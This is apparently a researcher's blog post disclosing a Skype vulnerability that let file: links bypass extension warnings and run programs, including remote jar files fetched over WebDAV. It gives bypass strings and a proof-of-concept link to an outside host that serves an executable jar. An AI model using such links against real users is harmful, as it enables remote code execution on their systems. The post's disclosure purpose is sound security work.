Part II: Skype File URI Security Bypass Code Execution Vulnerability

It’s time to reveal all the information about this vulnerability. I discovered ir several months ago. It was published via Idefense. Not too much information was revealed however it was more dangerous than the people thought

Basically Skype has some security restrictions when a file: URL is sent to a chat conversation. This URL is linkable and if skype detect some dangerous extensions, it shows a warning (if clicked). However the comparison isn’t ignore case, and is very easy to bypass using at least one upper case character: file:cmd.Exe (for example) or without any extension: file:cmd.

Even worst if we add a netbios computer name file:\\computername\sample.EXE it’ll be executed without any warning!!!!

And even better if we use an IP address and a jar file.
Skype doesn’t check “file:” link to verify if it’s an url with a jar extension (java executable). Once the user click on the link, the jar file will be executed in the system, without any Skype or Windows warning. This vulnerability could be used to remote code execution if the attacker send a link pointing to file in a webdav server.

Windows will use two methods to retrive the files:

a ) As a shared folder - The link will be treated as a shared folder, trying to connect with netbios
b ) Webdav Client - Windows Explorer is able to browse a WebDAV server as a network place. If the first method fails,
the integrated webdav client will be used allowing to download and execute the file from a remote webdav server.

EJ: file:\\webdavserver\dav\file.jar
POC: file:\\www.inkatel.com\MyDav\myjar.jar

Read the entire advisory for more information: Skype Security Bypass and Remote Code execution vulnerabilities

Leave a reply

You must be logged in to post a comment.